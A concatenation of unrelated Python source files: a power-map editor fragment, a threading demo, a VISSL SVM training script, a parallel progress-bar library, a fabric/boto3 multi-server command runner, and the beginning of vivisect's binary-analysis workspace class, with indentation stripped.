step_len = editor.step_length
t = Thread(
target=mapper.do_power_mapping, args=(bd, rp, cx, cy, padding, step_len)
)
t.start()
self._execute_thread = t
return True
def stop(self):
self.mapper.stop()
def traits_view(self):
v = View(
HGroup(
spring,
Item("beam_diameter", style="readonly"),
Item("power", style="readonly"),
Item("percent_threshold", label="% Threshold"),
visible_when="was_executed",
),
UItem("component", editor=ComponentEditor()),
resizable=True,
)
return v
if __name__ == "__main__":
e = PowerMapEditor()
p = "/Users/ross/Sandbox/powermap/powermap-2013-07-26005.hdf5"
p = "/Users/ross/Sandbox/powermap/powermap-2013-07-27008.hdf5"
e.load(p)
e.configure_traits()
# ============= EOF =============================================
|
02_simple_thread.py
|
'''
Simple threading implemented,
the time taken to make 10 calls of do_something()
is took around 2 seconds
'''
import time
import threading
start = time.perf_counter()
def do_something(seconds):
print(f'Sleeping {seconds} second...')
time.sleep(1)
print(f'Done Sleeping...{seconds}')
threads = []
for _ in range(10):
t = threading.Thread(target=do_something, args=[1])
t.start()
threads.append(t)
for t in threads:
t.join()
finish = time.perf_counter()
print(f'Finished in {round(finish-start, 2)} second(s)')
|
train_svm.py
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
import multiprocessing as mp
import sys
from argparse import Namespace
from typing import Any, List
import numpy as np
from hydra.experimental import compose, initialize_config_module
from vissl.hooks import default_hook_generator
from vissl.models.model_helpers import get_trunk_output_feature_names
from vissl.utils.checkpoint import get_checkpoint_folder
from vissl.utils.distributed_launcher import launch_distributed
from vissl.utils.env import set_env_vars
from vissl.utils.hydra_config import (
AttrDict,
convert_to_attrdict,
is_hydra_available,
print_cfg,
)
from vissl.utils.io import load_file
from vissl.utils.logger import setup_logging, shutdown_logging
from vissl.utils.misc import merge_features
from vissl.utils.svm_utils.svm_trainer import SVMTrainer
def train_svm(cfg: AttrDict, output_dir: str, layername: str):
# setup the environment variables
set_env_vars(local_rank=0, node_id=0, cfg=cfg)
# train the svm
logging.info(f"Training SVM for layer: {layername}")
trainer = SVMTrainer(cfg["SVM"], layer=layername, output_dir=output_dir)
train_data = merge_features(output_dir, "train", layername, cfg)
train_features, train_targets = train_data["features"], train_data["targets"]
trainer.train(train_features, train_targets)
# test the svm
test_data = merge_features(output_dir, "test", layername, cfg)
test_features, test_targets = test_data["features"], test_data["targets"]
trainer.test(test_features, test_targets)
logging.info("All Done!")
def main(args: Namespace, config: AttrDict):
# setup logging
setup_logging(__name__)
# print the coniguration used
print_cfg(config)
assert config.MODEL.FEATURE_EVAL_SETTINGS.EVAL_MODE_ON, (
"Feature eval mode is not ON. Can't run train_svm. "
"Set config.MODEL.FEATURE_EVAL_SETTINGS.EVAL_MODE_ON=True "
"in your config or from command line."
)
# extract the features
launch_distributed(
config,
args.node_id,
engine_name="extract_features",
hook_generator=default_hook_generator,
)
# Get the names of the features that we extracted features for. If user doesn't
# specify the features to evaluate, we get the full model output and freeze
# head/trunk both as caution.
layers = get_trunk_output_feature_names(config.MODEL)
if len(layers) == 0:
layers = ["heads"]
output_dir = get_checkpoint_folder(config)
running_tasks = [
mp.Process(target=train_svm, args=(config, output_dir, layer))
for layer in layers
]
for running_task in running_tasks:
running_task.start()
for running_task in running_tasks:
running_task.join()
# collect the mAP stats for all the layers and report
output_mAP = []
for layer in layers:
try:
ap_file = f"{output_dir}/{layer}/test_ap.npy"
output_mAP.append(round(100.0 * np.mean(load_file(ap_file)), 3))
except Exception:
output_mAP.append(-1)
logging.info(f"AP for various layers:\n {layers}: {output_mAP}")
# close the logging streams including the filehandlers
shutdown_logging()
def hydra_main(overrides: List[Any]):
with initialize_config_module(config_module="vissl.config"):
cfg = compose("defaults", overrides=overrides)
args, config = convert_to_attrdict(cfg)
main(args, config)
if __name__ == "__main__":
overrides = sys.argv[1:]
assert is_hydra_available(), "Make sure to install hydra"
hydra_main(overrides=overrides)
|
parallelbar.py
|
import os
from functools import partial
import multiprocessing as mp
from threading import Thread
from tqdm.auto import tqdm
from .tools import get_len
class ProgressBar(tqdm):
def __init__(self, *args, step=1, **kwargs):
super().__init__(*args, **kwargs)
self.step = step
self._value = 0
def _update(self):
if self._value % self.step == 0 and self._value < self.total:
super().update(self.step)
elif self._value == self.total:
extra = self._value % self.step
if extra:
super().update(extra)
else:
super().update(self.step)
elif self._value > self.total:
super().update(1)
def update(self):
self._value += 1
self._update()
def _process(func, pipe, task):
result = func(task)
pipe.send([os.getpid()])
return result
def _core_process_status(bar_size, bar_step, disable, pipe):
pid_dict = dict()
i = 0
while True:
result = pipe.recv()
if not result:
for val in pid_dict.values():
val.close()
break
try:
pid_dict[result[0]].update()
except KeyError:
i += 1
position = len(pid_dict)
pid_dict[result[0]] = ProgressBar(step=bar_step, total=bar_size, position=position, desc=f'Core {i}',
disable=disable)
pid_dict[result[0]].update()
def _process_status(bar_size, bar_step, disable, pipe):
bar = ProgressBar(step=bar_step, total=bar_size, disable=disable)
while True:
result = pipe.recv()
if not result:
bar.close()
break
bar.update()
def _bar_size(chunk_size, len_tasks, n_cpu):
bar_count, extra = divmod(len_tasks, chunk_size)
if bar_count < n_cpu:
bar_size = chunk_size
else:
bar_size, extra = divmod(len_tasks, n_cpu * chunk_size)
bar_size = bar_size * chunk_size
if extra:
bar_size += chunk_size
return bar_size
def _do_parallel(func, pool_type, tasks, n_cpu, chunk_size, core_progress,
context, total, bar_step, disable,
):
parent, child = mp.Pipe()
len_tasks = get_len(tasks, total)
if not n_cpu:
n_cpu = mp.cpu_count()
if not chunk_size:
chunk_size, extra = divmod(len_tasks, n_cpu * 4)
if extra:
chunk_size += 1
if core_progress:
bar_size = _bar_size(chunk_size, len_tasks, n_cpu)
thread = Thread(target=_core_process_status, args=(bar_size, bar_step, disable, parent))
else:
bar_size = len_tasks
thread = Thread(target=_process_status, args=(bar_size, bar_step, disable, parent))
thread.start()
with mp.get_context(context).Pool(n_cpu) as p:
target = partial(_process, func, child)
method = getattr(p, pool_type)
if pool_type == 'map':
result = method(target, tasks, chunksize=chunk_size)
else:
result = list(method(target, tasks, chunksize=chunk_size))
child.send(None)
thread.join()
return result
def progress_map(func, tasks, n_cpu=None, chunk_size=None, core_progress=False, context='spawn', total=None, bar_step=1,
disable=False):
result = _do_parallel(func, 'map', tasks, n_cpu, chunk_size, core_progress, context, total, bar_step, disable)
return result
def progress_imap(func, tasks, n_cpu=None, chunk_size=None, core_progress=False, context='spawn', total=None, bar_step=1,
disable=False):
result = _do_parallel(func, 'imap', tasks, n_cpu, chunk_size, core_progress, context, total, bar_step, disable)
return result
def progress_imapu(func, tasks, n_cpu=None, chunk_size=None, core_progress=False, context='spawn', total=None, bar_step=1,
disable=False):
result = _do_parallel(func, 'imap_unordered', tasks, n_cpu, chunk_size, core_progress, context, total, bar_step,
disable)
return result
|
__init__.py
|
#!/usr/bin/env python3
import argparse
import functools
import logging
import os
import queue
import re
import signal
import sys
import threading
from typing import (
Any,
Callable,
Dict,
Iterable,
Iterator,
List,
Optional,
TypeVar,
Union,
)
import boto3 # type: ignore
import fabric # type: ignore
T = TypeVar("T")
ColorFunc = Callable[[str], str]
TaskFunc = Callable[[], None]
Ip = Dict[str, Optional[str]]
Filters = List[Dict[str, Union[str, List[str]]]]
__version__ = "0.6.2"
CHUNK_SIZE = 50
DEFAULT = {"threads": 10, "timeout": 10}
HELP = {
"command": "shell command to execute",
"hosts": "list of IP addresses",
"i": "private key path",
"kind": "AWS resource type (id: instance ID, asg: Auto Scaling Group name, elb: Elastic Load Balancer name)",
"local": "path to local file",
"public": "prefer public IP addresses",
"region": "AWS region name",
"remote": "path to remote file",
"threads": "number of concurrent connections",
"timeout": "connection timeout in seconds",
"user": "remote server user",
"values": "list of resource identifiers",
"verbose": "show more output",
}
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
log.addHandler(logging.StreamHandler(sys.stdout))
tasks: "queue.Queue[TaskFunc]" = queue.Queue()
stop = threading.Event()
num_success = 0
lock = threading.Lock()
def inc_success() -> None:
global num_success
with lock:
num_success += 1
def ansi(x: int) -> str:
return "\033[{}m".format(x)
def colored(s: str, code: int = 0, bold: bool = False) -> str:
has_attr = code > 0 or bold
if has_attr and sys.stdout.isatty() and "NO_COLOR" not in os.environ:
bold_attr = ansi(1) if bold else ""
return ansi(code) + bold_attr + s + ansi(0)
return s
def red(s: str) -> str:
return colored(s, code=31)
def green(s: str) -> str:
return colored(s, code=32)
def yellow(s: str) -> str:
return colored(s, code=33)
def chunks(L: List[T], n: int) -> Iterator[List[T]]:
for i in range(0, len(L), n):
yield L[i : i + n]
class Connection(object):
def __init__(
self, host: str, user: str, timeout: int, key_filename: str, color: ColorFunc
) -> None:
self.host = host
self.color = color
self.conn = fabric.Connection(
host,
user=user,
connect_timeout=timeout,
connect_kwargs={
"key_filename": key_filename,
"auth_timeout": timeout,
"banner_timeout": timeout,
},
)
def print(self, s: str, color: ColorFunc = colored) -> None:
for line in s.splitlines():
log.info(self.color(self.host) + "\t" + color(line))
def run(self, command: str) -> None:
self.print("{}\t{}".format(yellow("run"), command))
try:
with self.conn as c:
result = c.run(command, pty=True, hide=True, warn=True, in_stream=False)
except Exception as e:
self.print(str(e), color=red)
else:
if result.ok:
self.print(result.stdout)
inc_success()
else:
self.print(result.stdout, color=red)
def put(self, local: str, remote: str) -> None:
self.print("{}\t{}\t{}".format(yellow("put"), local, remote))
try:
with self.conn as c:
c.put(local, remote=remote)
except Exception as e:
self.print(str(e), color=red)
else:
self.print("ok", color=green)
inc_success()
def get(self, remote: str) -> None:
local = os.path.join(self.host, os.path.basename(remote))
self.print("{}\t{}\t{}".format(yellow("get"), remote, local))
try:
os.mkdir(self.host)
except OSError:
pass
try:
with self.conn as c:
c.get(remote, local=local)
except Exception as e:
self.print(str(e), color=red)
else:
self.print("ok", color=green)
inc_success()
def find_instance_ids(L: List[str]) -> Iterator[str]:
for s in L:
for match in re.findall(r"[\da-f]{17}|[\da-f]{8}", s):
yield "i-" + match
def describe_instances(client: Any, filters: Filters) -> Iterator[Dict[str, str]]:
reservations = client.describe_instances(Filters=filters)
for reservation in reservations["Reservations"]:
for instance in reservation["Instances"]:
yield instance
def instance_ids_to_ip_addrs(client: Any, instance_ids: Iterable[str]) -> Iterator[Ip]:
# Send request in batches to avoid FilterLimitExceeded. Use Filters
# instead of InstanceIds to avoid exception on non-existent instance ID
# (e.g. during scale-out or when hastily pasting a bunch of text).
for chunk in chunks(list(instance_ids), CHUNK_SIZE):
filters: Filters = [{"Name": "instance-id", "Values": chunk}]
for instance in describe_instances(client, filters):
yield {
"public": instance.get("PublicIpAddress"),
"private": instance.get("PrivateIpAddress"),
}
def asgs_to_instance_ids(client: Any, asg_names: List[str]) -> Iterator[str]:
asgs = client.describe_auto_scaling_groups(AutoScalingGroupNames=asg_names)
for asg in asgs["AutoScalingGroups"]:
for instance in asg["Instances"]:
yield instance["InstanceId"]
def elbs_to_instance_ids(client: Any, elb_names: List[str]) -> Iterator[str]:
elbs = client.describe_load_balancers(LoadBalancerNames=elb_names)
for elb in elbs["LoadBalancerDescriptions"]:
for instance in elb["Instances"]:
yield instance["InstanceId"]
def print_ip_addrs(ip_addrs: Iterable[Ip], public: bool) -> None:
for ip_addr in ip_addrs:
public_ip = ip_addr["public"]
private_ip = ip_addr["private"]
if public and public_ip:
log.info(public_ip)
elif private_ip:
log.info(private_ip)
def get_ip_addrs(values: List[str], kind: str, region_name: str) -> Iterator[Ip]:
if kind == "id":
instance_ids = find_instance_ids(values)
elif kind == "asg":
autoscaling = boto3.client("autoscaling", region_name=region_name)
instance_ids = asgs_to_instance_ids(autoscaling, values)
elif kind == "elb":
elb = boto3.client("elb", region_name=region_name)
instance_ids = elbs_to_instance_ids(elb, values)
ec2 = boto3.client("ec2", region_name=region_name)
return instance_ids_to_ip_addrs(ec2, instance_ids)
def get_colors() -> Iterator[ColorFunc]:
for bold in (False, True):
for code in range(31, 37):
yield functools.partial(colored, code=code, bold=bold)
def get_conns(args: argparse.Namespace) -> Iterator[Connection]:
colors = list(get_colors())
for i, host in enumerate(args.hosts):
if host:
yield Connection(
host, args.user, args.timeout, args.i, colors[i % len(colors)]
)
def get_tasks(args: argparse.Namespace) -> List[TaskFunc]:
conns = get_conns(args)
if args.tool == "run":
return [functools.partial(conn.run, args.command) for conn in conns]
elif args.tool == "get":
return [functools.partial(conn.get, args.remote) for conn in conns]
elif args.tool == "put":
return [functools.partial(conn.put, args.local, args.remote) for conn in conns]
return []
def worker() -> None:
while not stop.is_set():
try:
task = tasks.get_nowait()
task()
tasks.task_done()
except queue.Empty:
break
def run_workers(num_workers: int) -> None:
threads = []
for _ in range(num_workers):
thread = threading.Thread(target=worker)
thread.start()
threads.append(thread)
for thread in threads:
while thread.is_alive():
thread.join(1)
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(description="Tiny multi-server automation tool.")
parser.add_argument("--version", action="version", version=__version__)
parser.add_argument("--verbose", action="store_true", help=HELP["verbose"])
subparsers = parser.add_subparsers(dest="tool")
aws_parser = subparsers.add_parser(
"ip", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
aws_parser.add_argument("--region", help=HELP["region"])
aws_parser.add_argument("--public", action="store_true", help=HELP["public"])
aws_parser.add_argument("kind", choices=("id", "asg", "elb"), help=HELP["kind"])
aws_parser.add_argument("values", nargs="+", help=HELP["values"])
run_parser = subparsers.add_parser(
"run", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
run_parser.add_argument("-i", help=HELP["i"])
run_parser.add_argument(
"--timeout", type=float, default=DEFAULT["timeout"], help=HELP["timeout"]
)
run_parser.add_argument(
"--threads", type=int, default=DEFAULT["threads"], help=HELP["threads"]
)
run_parser.add_argument("command", help=HELP["command"])
run_parser.add_argument("user", help=HELP["user"])
run_parser.add_argument("hosts", nargs="+", help=HELP["hosts"])
get_parser = subparsers.add_parser(
"get", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
get_parser.add_argument("-i", help=HELP["i"])
get_parser.add_argument(
"--timeout", type=float, default=DEFAULT["timeout"], help=HELP["timeout"]
)
get_parser.add_argument(
"--threads", type=int, default=DEFAULT["threads"], help=HELP["threads"]
)
get_parser.add_argument("remote", help=HELP["remote"])
get_parser.add_argument("user", help=HELP["user"])
get_parser.add_argument("hosts", nargs="+", help=HELP["hosts"])
put_parser = subparsers.add_parser(
"put", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
put_parser.add_argument("-i", help=HELP["i"])
put_parser.add_argument(
"--timeout", type=float, default=DEFAULT["timeout"], help=HELP["timeout"]
)
put_parser.add_argument(
"--threads", type=int, default=DEFAULT["threads"], help=HELP["threads"]
)
put_parser.add_argument("local", help=HELP["local"])
put_parser.add_argument("remote", help=HELP["remote"])
put_parser.add_argument("user", help=HELP["user"])
put_parser.add_argument("hosts", nargs="+", help=HELP["hosts"])
args = parser.parse_args()
if not args.tool:
parser.print_help()
sys.exit(1)
return args
def main() -> int:
# Avoid throwing exception on SIGPIPE.
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
if args.tool == "ip":
print_ip_addrs(get_ip_addrs(args.values, args.kind, args.region), args.public)
return 0
else:
for task in get_tasks(args):
tasks.put_nowait(task)
try:
num_workers = min(args.threads, len(args.hosts))
run_workers(num_workers)
except KeyboardInterrupt:
stop.set()
log.info(red("terminating"))
with lock:
return len(args.hosts) - num_success
if __name__ == "__main__":
sys.exit(main())
|
__init__.py
|
"""
Yay! It's NOT IDA!!!1!!1!one!
"""
import os
import re
import sys
import time
import queue
import string
import hashlib
import logging
import itertools
import traceback
import threading
import collections
import envi
import envi.exc as e_exc
import envi.bits as e_bits
import envi.common as e_common
import envi.memory as e_mem
import envi.config as e_config
import envi.bytesig as e_bytesig
import envi.symstore.resolver as e_resolv
import envi.symstore.symcache as e_symcache
import vstruct
import vstruct.cparse as vs_cparse
import vstruct.primitives as vs_prims
import vivisect.base as viv_base
import vivisect.parsers as viv_parsers
import vivisect.codegraph as viv_codegraph
import vivisect.impemu.lookup as viv_imp_lookup
from vivisect.exc import *
from vivisect.const import *
from vivisect.defconfig import *
import vivisect.analysis.generic.emucode as v_emucode
logger = logging.getLogger(__name__)
STOP_LOCS = (LOC_STRING, LOC_UNI, LOC_STRUCT, LOC_CLSID, LOC_VFTABLE, LOC_IMPORT, LOC_PAD, LOC_NUMBER)
STORAGE_MAP = {
'viv': 'vivisect.storage.basicfile',
'mpviv': 'vivisect.storage.mpfile',
}
def guid(size=16):
return e_common.hexify(os.urandom(size))
class VivWorkspace(e_mem.MemoryObject, viv_base.VivWorkspaceCore):
'''
VivWorkspace is the heart of vivisect's binary analysis. Most APIs accept a VivWorkspace
as their first parameter, and the workspace is responsible for all the user facing functions
of getters/adders, running analysis passes, making the various locations, loading files, and
more.
Current keyword arguments:
* confdir:
* Type: String (path to directory)
* Description: A path to a directory to save/load vivisect's analysis configuration options (options will be saved to/loaded from the viv.json file in the directory
* Default: $HOME/.viv/
* autosave (boolean):
* Type: Boolean
* Description: If true, autosave any configuration changes to the <confdir>/viv.json upon changing them.
* Default: False
'''
def __init__(self, **kwargs):
e_mem.MemoryObject.__init__(self)
viv_base.VivWorkspaceCore.__init__(self)
autosave = kwargs.get('autosave', False)
cfgdir = kwargs.get('confdir', None)
if cfgdir:
self.vivhome = os.path.abspath(cfgdir)
else:
self.vivhome = e_config.gethomedir(".viv", makedir=autosave)
self._viv_gui = None # If a gui is running, he will put a ref here...
self._ext_ctxmenu_hooks = {}
self._extensions = {}
self.saved = False # TODO: Have a warning when we try to close the UI if the workspace hasn't been saved
self.rchan = None
self.server = None
self.chanids = itertools.count()
self.arch = None # The placeholder for the Envi architecture module
self.psize = None # Used so much, optimization is appropriate
cfgpath = os.path.join(self.vivhome, 'viv.json')
self.config = e_config.EnviConfig(filename=cfgpath, defaults=defconfig, docs=docconfig, autosave=autosave)
# Ideally, *none* of these are modified except by _handleFOO funcs...
self.segments = []
self.exports = []
self.imports = []
self.codeblocks = []
self.relocations = []
self._dead_data = []
self.iscode = {}
self.xrefs = []
self.xrefs_by_to = {}
self.xrefs_by_from = {}
# XXX - make config option
self.greedycode = 0
self.metadata = {}
self.comments = {} # Comment by VA.
self.symhints = {}
self.filemeta = {} # Metadata Dicts stored by filename
self.transmeta = {} # Metadata that is *not* saved/evented
self.cfctx = viv_base.VivCodeFlowContext(self)
self.va_by_name = {}
self.name_by_va = {}
self.codeblocks_by_funcva = {}
self.exports_by_va = {}
self.colormaps = {}
self.vasetdefs = {}
self.vasets = {}
self.reloc_by_va = {}
self.func_args = {}
self.funcmeta = {} # Function metadata stored in the workspace
self.frefs = {}
# Extended analysis modules
self.amods = {}
self.amodlist = []
# Extended *function* analysis modules
self.fmods = {}
self.fmodlist = []
self.chan_lookup = {}
self.nextchanid = 1
self._cached_emus = {}
# The function entry signature decision tree
# FIXME add to export
self.sigtree = e_bytesig.SignatureTree()
self.siglist = []
self._op_cache = {}
self._initEventHandlers()
# Some core meta types that exist
self.setMeta('NoReturnApis', {})
self.setMeta('SymbolikImportEmulation', None)
# Default to basic file storage
self.setMeta("StorageModule", "vivisect.storage.basicfile")
# There are a few default va sets for use in analysis
self.addVaSet('EntryPoints', (('va', VASET_ADDRESS),))
self.addVaSet('NoReturnCalls', (('va', VASET_ADDRESS),))
self.addVaSet("Emulation Anomalies", (("va", VASET_ADDRESS), ("Message", VASET_STRING)))
self.addVaSet("Bookmarks", (("va", VASET_ADDRESS), ("Bookmark Name", VASET_STRING)))
self.addVaSet('DynamicBranches', (('va', VASET_ADDRESS), ('opcode', VASET_STRING), ('bflags', VASET_INTEGER)))
self.addVaSet('SwitchCases', (('va', VASET_ADDRESS), ('setup_va', VASET_ADDRESS), ('Cases', VASET_INTEGER)))
self.addVaSet('PointersFromFile', (('va', VASET_ADDRESS), ('target', VASET_ADDRESS), ('file', VASET_STRING), ('comment', VASET_STRING), ))
self.addVaSet('CodeFragments', (('va', VASET_ADDRESS), ('calls_from', VASET_COMPLEX)))
self.addVaSet('EmucodeFunctions', (('va', VASET_ADDRESS),))
self.addVaSet('FuncWrappers', (('va', VASET_ADDRESS), ('wrapped_va', VASET_ADDRESS),))
def vprint(self, msg):
logger.info(msg)
def getVivGui(self):
'''
Return a reference to the vivisect GUI object for this workspace. If
the GUI is not running (aka, the workspace is being used programatically)
this routine returns None.
Example:
vwgui = vw.getVivGui()
if vwgui:
vwgui.doStuffAndThings()
'''
return self._viv_gui
def getPointerSize(self):
return self.psize
def addCtxMenuHook(self, name, handler):
'''
Extensions can add Context Menu hooks to modify the menu as they wish.
This would most often happen from the Extension's vivExtension() init function.
see vivisect.qt.ctxmenu for more details
handler should have the following prototype (inc. example code):
from vqt.common import ACT
def myExtCtxMenuHandler(vw, menu):
toymenu = menu.addMenu('myToys')
toymenu.addAction('Voodoo Wizbang ZeroDay Finder Thingy', ACT(doCoolShit, vw, va))
Currently, this should live in a loaded module, not in your Viv Extension's main py file.
'''
if name in self._ext_ctxmenu_hooks:
cur = self._ext_ctxmenu_hooks[name]
logger.warning("Attempting to hook the context menu: %r is already registered \
(cur: %r new: %r)", name, cur, handler)
return
self._ext_ctxmenu_hooks[name] = handler
def delCtxMenuHook(self, name):
'''
Remove a context-menu hook that has been installed by an extension
'''
self._ext_ctxmenu_hooks.pop(name, None)
def addExtension(self, name, extmod):
'''
Add extension module to a list of extensions.
This keeps a list of installed extension modules, with the added value
of keeping the loaded module in memory.
'''
if name in self._extensions:
cur = self._extensions[name]
logger.warning("Attempting to register an extension: %r is already registered \
(cur: %r new: %r)", name, cur, handler)
return
self._extensions[name] = extmod
def delExtension(self, name):
'''
Remove's extension module from the list of extensions.
'''
self._extensions.pop(name, None)
def getVivGuid(self):
'''
Return the GUID for this workspace. Every newly created VivWorkspace
should have a unique GUID, for identifying a particular workspace for
a given binary/process-space versus another created at a different
time. Filesystem-copies of the same workspace will have the same GUID
by design. This easily allows for workspace-specific GUI layouts as
well as comparisons of Server-based workspaces to the original file-
based workspace used to store to the server.
'''
vivGuid = self.getMeta('GUID')
if vivGuid is None:
vivGuid = guid()
self.setMeta('GUID', vivGuid)
return vivGuid
def loadWorkspace(self, wsname):
mname = self.getMeta("StorageModule")
mod = self.loadModule(mname)
mod.loadWorkspace(self, wsname)
self.setMeta("StorageName", wsname)
# The event list thusfar came *only* from the load...
self._createSaveMark()
# Snapin our analysis modules
self._snapInAnalysisModules()
def addFref(self, fva, va, idx, val):
"""
Add a reference from the operand at virtual address 'va'
index 'idx' to a function local offset. Positive values
(beginning with 0) are considered argument references. Negative
values are considered function local storage and are relative to
the stack pointer at function entry.
"""
# FIXME this should probably be an argument
r = (va, idx, val)
self._fireEvent(VWE_ADDFREF, r)
def getFref(self, va, idx):
"""
Get back the fref value (or None) for the given operand index
from the instruction at va.
"""
return self.frefs.get((va, idx))
def getEmulator(self, **kwargs):
"""
Get an instance of a WorkspaceEmulator for this workspace.
Use logread/logwrite to enable memory access tracking.
"""
plat = self.getMeta('Platform')
arch = self.getMeta('Architecture')
eclass = viv_imp_lookup.workspace_emus.get((plat, arch))
if eclass is None:
eclass = viv_imp_lookup.workspace_emus.get(arch)
if eclass is None:
raise Exception("WorkspaceEmulation not supported on %s yet!" % arch)
emu = eclass(self, **kwargs)
emu.setEndian(self.getEndian())
return emu
def getCachedEmu(self, emuname):
"""
Get a cached emulator by name. If one doesn't exist it is
created and then cached.
"""
emu = self._cached_emus.get(emuname)
if emu is None:
emu = self.getEmulator()
self._cached_emus[emuname] = emu
return emu
def addLibraryDependancy(self, libname):
"""
Add a *normalized* library name to the import search
chain for this binary. This is only needed for formats
whose imports don't explicitly state their library name.
"""
# FIXME this needs to be event enabled... either plumb it special,
# or allow the get/append/set race...
dl = self.getMeta("DepLibs", None)
if dl is None:
dl = []
dl.append(libname)
self.setMeta("DepLibs", dl)
def getLibraryDependancies(self):
'''
Retrieve the list of *normalized* library dependancies.
'''
dl = self.getMeta("DepLibs", None)
if dl is None:
return []
return list(dl)
def setComment(self, va, comment, check=False):
'''
Set the humon readable comment for a given virtual.
Comments will be displayed by the code renderer, and
are an important part of this balanced breakfast.
Example:
vw.setComment(callva, "This actually calls FOO...")
'''
if check and self.comments.get(va):
return
self._fireEvent(VWE_COMMENT, (va, comment))
def getComment(self, va):
'''
Returns the comment string (or None) for a given
virtual address.
Example:
cmnt = vw.getComment(va)
print('COMMENT: %s' % cmnt)
'''
return self.comments.get(va)
def getComments(self):
'''
Retrieve all the comments in the viv workspace as
(va, cmnt) tuples.
Example:
for va,cmnt in vw.getComments():
print('Comment at 0x%.8x: %s' % (va, cmnt))
'''
return list(self.comments.items())
def addRelocation(self, va, rtype, data=None):
"""
Add a relocation entry for tracking.
Expects data to have whatever is necessary for the reloc type. eg. addend
"""
# split "current" va into fname and offset. future relocations will want to base all va's from an image base
mmap = self.getMemoryMap(va)
if not mmap:
logger.warning('addRelocation: No matching map found for %s', va)
return None
mmva, mmsz, mmperm, fname = mmap # FIXME: getFileByVa does not obey file defs
imgbase = self.getFileMeta(fname, 'imagebase')
offset = va - imgbase
self._fireEvent(VWE_ADDRELOC, (fname, offset, rtype, data))
return self.getRelocation(va)
def getRelocations(self):
"""
Get the current list of relocation entries.
"""
return self.relocations
def getRelocation(self, va):
"""
Return the type of relocation at the specified
VA or None if there isn't a relocation entry for
the address.
"""
return self.reloc_by_va.get(va)
def pointerString(self, va):
return self.arch.pointerString(va)
def getAnalysisModuleNames(self):
return list(self.amodlist)
def getFuncAnalysisModuleNames(self):
return list(self.fmodlist)
def addFunctionSignatureBytes(self, bytez, mask=None):
"""
Add a function signature entry by bytes. This is mostly used by
file parsers/loaders to manually tell the workspace about known
entry signature types.
see envi.bytesig for details.
"""
self.sigtree.addSignature(bytez, mask)
self.siglist.append((bytez, mask))
def isFunctionSignature(self, va):
"""
Check if the specified va is a function entry signature
according to the current entry point signature tree...
"""
if not self.isValidPointer(va):
return False
offset, bytes = self.getByteDef(va)
return self.sigtree.isSignature(bytes, offset=offset)
def addNoReturnVa(self, va):
noretva = self.getMeta('NoReturnApisVa', {})
noretva[va] = True
self.setMeta('NoReturnApisVa', noretva)
self.cfctx.addNoReturnAddr(va)
def addNoReturnApi(self, funcname):
"""
Inform vivisect code-flow disassembly that any call target
which matches the specified name ("funcname" or "libname.funcname"
for imports) does *not* exit and code-flow should be stopped...
"""
funcname = funcname.lower()
m = self.getMeta('NoReturnApis', {})
m[funcname] = True
self.setMeta('NoReturnApis', m)
noretva = self.getMeta('NoReturnApisVa', {})
# If we already have an import entry, we need to update codeflow
for lva, lsize, ltype, linfo in self.getImports():
if linfo.lower() != funcname:
continue
self.cfctx.addNoReturnAddr(lva)
noretva[lva] = True
self.setMeta('NoReturnApisVa', noretva)
def addNoReturnApiRegex(self, funcre):
'''
Inform vivisect code-flow disassembly that any call target
which matches the specified regex ("funcname" or "libname.funcname"
for imports) does *not* exit and code-flow should be stopped...
'''
c = re.compile(funcre, re.IGNORECASE)
m = self.getMeta('NoReturnApisRegex', [])
m.append(funcre)
self.setMeta('NoReturnApisRegex', m)
for lva, lsize, ltype, linfo in self.getImports():
if c.match(linfo):
self.addNoReturnApi(linfo)
def isNoReturnVa(self, va):
'''
Check if a VA is a no return API
'''
isva = self.getMeta('NoReturnApisVa', {}).get(va, False)
iscall = self.getVaSetRow('NoReturnCalls', va) is not None
return isva or iscall
def checkNoRetApi(self, apiname, va):
'''
Called as new APIs (thunks) are discovered, checks to see
if they wrap a NoReturnApi. Updates if it is a no ret API thunk
'''
noretva = self.getMeta('NoReturnApisVa', {})
for funcre in self.getMeta('NoReturnApisRegex', []):
c = re.compile(funcre, re.IGNORECASE)
if c.match(apiname):
self.cfctx.addNoReturnAddr(va)
noretva[va] = True
for funcname in self.getMeta('NoReturnApis', {}).keys():
if funcname.lower() == apiname.lower():
self.cfctx.addNoReturnAddr(va)
noretva[va] = True
self.setMeta('NoReturnApisVa', noretva)
def addAnalysisModule(self, modname):
"""
Add an analysis module by python import path
"""
if modname in self.amods:
return
mod = self.loadModule(modname)
self.amods[modname] = mod
self.amodlist.append(modname)
logger.debug('Adding Analysis Module: %s', modname)
def delAnalysisModule(self, modname):
"""
Remove an analysis module from the list used during analysis()
"""
if modname not in self.amods:
raise Exception("Unknown Module in delAnalysisModule: %s" % modname)
x = self.amods.pop(modname, None)
if x is not None:
self.amodlist.remove(modname)
def loadModule(self, modname):
__import__(modname)
return sys.modules[modname]
def addFuncAnalysisModule(self, modname):
"""
Snap in a per-function analysis module (by name) which
will be triggered during the creation of a new function
(makeFunction).
"""
if modname in self.fmods:
return
mod = self.loadModule(modname)
self.fmods[modname] = mod
self.fmodlist.append(modname)
logger.debug('Adding Function Analysis Module: %s', modname)
def delFuncAnalysisModule(self, modname):
'''
Remove a currently registered function analysis module.
Example:
vw.delFuncAnalysisModule('mypkg.mymod')
'''
x = self.fmods.pop(modname, None)
if x is None:
raise Exception("Unknown Module in delAnalysisModule: %s" % modname)
self.fmodlist.remove(modname)
def createEventChannel(self):
chanid = next(self.chanids)
self.chan_lookup[chanid] = queue.Queue()
return chanid
def importWorkspace(self, wsevents):
"""
Import and initialize data from the given vivisect workspace
export.
"""
# During import, if we have a server, be sure not to notify
# the server about the events he just gave us...
local = False
if self.server is not None:
local = True
# Process the events from the import data...
fe = self._fireEvent
for event, einfo in wsevents:
fe(event, einfo, local=local)
return
def exportWorkspace(self):
'''
Return the (probably big) list of events which define this
workspace.
'''
return self._event_list
def exportWorkspaceChanges(self):
'''
Export the list of events which have been applied to the
workspace since the last save.
'''
return self._event_list[self._event_saved:]
def initWorkspaceClient(self, remotevw):
"""
Initialize this workspace as a workspace
client to the given (potentially cobra remote)
